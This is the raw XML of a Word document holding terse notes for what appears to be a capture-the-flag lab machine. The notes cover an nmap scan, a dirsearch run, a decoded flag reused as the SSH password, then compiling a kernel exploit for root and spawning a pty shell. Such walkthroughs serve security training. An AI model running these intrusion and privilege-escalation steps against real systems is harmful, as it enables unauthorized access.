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CD41" w14:textId="27EAF643" w:rsidR="00D419E7" w:rsidRDefault="00EF05D7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t xml:space="preserve"> 192.168.1.172 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF05D7">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BF62D7F" w14:textId="50756273" w:rsidR="00BF1DAA" w:rsidRDefault="00BF1DAA">
      <w:r>
        <w:t>port 80 search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F6B9A" w14:textId="1C1AC5BC" w:rsidR="00AA77AB" w:rsidRPr="00AA77AB" w:rsidRDefault="00AA77AB" w:rsidP="00AA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77AB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username:itsskv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="424EA461" w14:textId="4945AA1D" w:rsidR="00BF1DAA" w:rsidRDefault="00BF1DAA"/>
    <w:p w14:paraId="109C0370" w14:textId="2795615C" w:rsidR="000D1C7B" w:rsidRDefault="000D1C7B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="000D1C7B">
        <w:t>irsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D1C7B">
        <w:t xml:space="preserve"> -u 192.168.1.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478DDD2D" w14:textId="73F262CF" w:rsidR="003D17F9" w:rsidRDefault="00DC5332">
      <w:r w:rsidRPr="00DC5332">
        <w:t>echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C4CEE1" w14:textId="371F51B2" w:rsidR="00E56B11" w:rsidRDefault="00E56B11">
      <w:r>
        <w:t xml:space="preserve">password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E56B11">
        <w:t>cybersploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E56B11">
        <w:t>{youtube.com/c/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E56B11">
        <w:t>cybersploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E56B11">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761FF00" w14:textId="7C456723" w:rsidR="003D17F9" w:rsidRDefault="003D17F9">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D17F9">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D17F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00C933EB" w:rsidRPr="00721112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>itsskv@1</w:t>
        </w:r>
        <w:r w:rsidR="00C933EB" w:rsidRPr="00721112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>92.168.1.172</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EA91295" w14:textId="272DD270" w:rsidR="00580F31" w:rsidRDefault="00580F31">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580F31">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EECF9B" w14:textId="7E8660E3" w:rsidR="00580F31" w:rsidRPr="00580F31" w:rsidRDefault="00580F31">
      <w:r w:rsidRPr="00580F31">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00580F31">
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00580F31">
        <w:t xml:space="preserve"> the kernel version in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00580F31">
        <w:t>dbexploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00580F31">
        <w:t>_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F26C91" w14:textId="77777777" w:rsidR="00C933EB" w:rsidRDefault="00C933EB" w:rsidP="00C933EB">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="663BEC50" w14:textId="77777777" w:rsidR="00C933EB" w:rsidRDefault="00C933EB" w:rsidP="00C933EB">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="257DBE18" w14:textId="59539E4D" w:rsidR="00C933EB" w:rsidRDefault="00C933EB">
      <w:r>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">         (to get clear terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A8E328" w14:textId="77777777" w:rsidR="003D17F9" w:rsidRDefault="003D17F9"/>
    <w:sectPr w:rsidR="003D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B6"/>
    <w:rsid w:val="000D1C7B"/>
    <w:rsid w:val="003D17F9"/>
    <w:rsid w:val="004967B6"/>
    <w:rsid w:val="00580F31"/>
    <w:rsid w:val="00AA77AB"/>
    <w:rsid w:val="00BF1DAA"/>
    <w:rsid w:val="00C933EB"/>
    <w:rsid w:val="00D419E7"/>
    <w:rsid w:val="00DC5332"/>
    <w:rsid w:val="00E56B11"/>
    <w:rsid w:val="00E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9DA5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{481C3E0A-FC56-450A-8926-65907525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7A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A77AB"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C93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sskv@192.168.1.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2023-12-01T15:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T16:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>